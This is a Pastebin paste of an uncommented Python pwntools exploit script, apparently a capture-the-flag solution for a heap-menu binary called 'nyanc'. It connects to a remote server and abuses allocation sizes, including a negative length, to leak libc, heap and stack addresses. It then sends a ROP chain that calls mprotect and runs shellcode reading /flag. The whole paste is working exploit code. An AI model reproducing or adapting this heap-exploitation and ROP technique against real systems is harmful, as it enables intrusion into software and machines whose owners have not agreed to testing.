Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # encoding: utf-8
- from pwn import *
- import sys
- import ctypes
- from time import sleep
- LOCAL = "remote" not in sys.argv
- BINARY = "nyanc"
- elf = ELF(BINARY)
- context.log_level = "debug" if "debug" in sys.argv else "info"
- #context.terminal = ['urxvt', '-geometry', '160x60', '-e', 'sh', '-c']
- context.terminal = ['tmux', 'splitw', '-h', '-l', '150']
- context.update(binary=elf)
- #libc = ELF("libc.so")
- #rop = ROP(libc)
- #binsh = next(libc.search("/bin/sh"))
- def debug():
- if "gdb" in sys.argv:
- pie_base = r.libs()[os.path.realpath(r.executable)]
- # pie_base = 0
- gdb.attach(BINARY, """
- b *%#x
- b *%#x
- b *%#x
- c
- """ % (
- pie_base + 0xb98, # ret
- pie_base + 0xb28, # ret
- pie_base + 0xc38, # ret
- ))
- raw_input('attach')
- if LOCAL:
- r = process(BINARY)
- else:
- r = remote("34.245.41.40", 1337)
- def add(len, data):
- r.sendlineafter(" > ", "1")
- r.sendlineafter("len : ", str(len))
- if len <= 0:
- return
- r.sendafter("data : ", data)
- def view(idx):
- r.sendlineafter(" > ", "2")
- r.sendlineafter("index : ", str(idx))
- return r.readuntil("======")
- def edit(idx, data):
- r.sendlineafter(" > ", "3")
- r.sendlineafter("index : ", str(idx))
- r.sendafter("data : ", data)
- def free(idx):
- r.sendlineafter(" > ", "4")
- r.sendlineafter("index : ", str(idx))
- add(0x450-(16+32), "a"*24)
- add(0, "b")
- align = 0x960
- edit(1,"\x00"*24+p64(align+1)+"\x00"*32)
- add(4096, "c")
- add(0, "d")
- libc_leak = view(3).split("data: ")[1].split("======")[0]
- libc_leak = u64(libc_leak.ljust(8,"\x00")) - 0x154010
- log.success("libc base @ " + hex(libc_leak))
- add(align-0x40-0x10, "eeee")
- add(0, "f")
- edit(5,"\x00"*24+"\xff"*8+"\x00"*32)
- add("-137616","g")
- add(0,"h")
- heap_leak = view(7).split("data: ")[1].split("======")[0]
- heap_leak = u64(heap_leak.ljust(8,"\x00")) - 48
- log.success("current heap ptr @ " + hex(heap_leak))
- edit(7,"\x00"*24+"\xff"*8+"\x00"*0x200)
- libc_argv = 0x157dc0
- offset = libc_leak - heap_leak + libc_argv
- free(0)
- free(1)
- free(2)
- free(3)
- add(offset-32-96, "0")
- add(0,"1")
- stack_leak = view(1).split("data: ")[1].split("======")[0]
- if len(stack_leak) < 8:
- log.fail("no leak :-(")
- exit(-1)
- stack_leak = u64(stack_leak[8:].ljust(8,"\x00"))
- log.success("argv ptr @ " + hex(stack_leak))
- offset = stack_leak - (libc_leak + libc_argv) - 328 - 48 - 16 - 8 - 64
- shellcode = shellcraft.cat('/flag') + shellcraft.exit(0)
- #shellcode = shellcraft.breakpoint() + shellcraft.cat('/flag') + shellcraft.exit(0)
- edit(7, p64(7) + p64(0x4007) + p64(heap_leak & 0xfffffffffffff000) + asm(shellcode))
- add(offset,"k")
- debug()
- shellcode_addr = p64(heap_leak + 0x68)
- ld = libc_leak + 0x159000
- loadx1x2 = p64(libc_leak + 0xf7b74) # ldp x2, x1, [x19, #0x58] ; sub x1, x1, x2 ; sub w0, w0, w1 ; ldp x19, x20, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
- loadx0 = p64(ld + 0x103e4) # : ldr x0, [x29, #0x68] ; ldp x29, x30, [sp], #0x70 ; ret
- mprotect = p64(libc_leak + 0x72DF4 )
- ropchain = "aaaaaaaabbbbbbbbcccccccc" + loadx1x2 + p64(heap_leak - 0x8) + "ffffffffgggggggghhhhhhhh" + p64(heap_leak - 0x8) + loadx0 + p64(heap_leak - 0x80)*3 + mprotect + "ooooooooppppppppqqqqqqqqrrrrrrrrssssssssttttttttuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxyyyyyyyyzzzzzzzzAAAAAAAA" + shellcode_addr + "CCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHHIIIIIIIIJJJJJJJJKKKKKKKKLLLLLLLLMMMMMMMMNNNNNNNNOOOOOOOOPPPPPPPPQQQQQQQQRRRRRRRRSSSSSSSSTTTTTTTTUUUUUUUUVVVVVVVVWWWWWWWWXXXXXXXXYYYYYYYYZZZZZZZZ"
- add(500, ropchain)
- log.info('Getting shell...')
- #r.sendline("cat flag*;")
- r.interactive()
- r.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement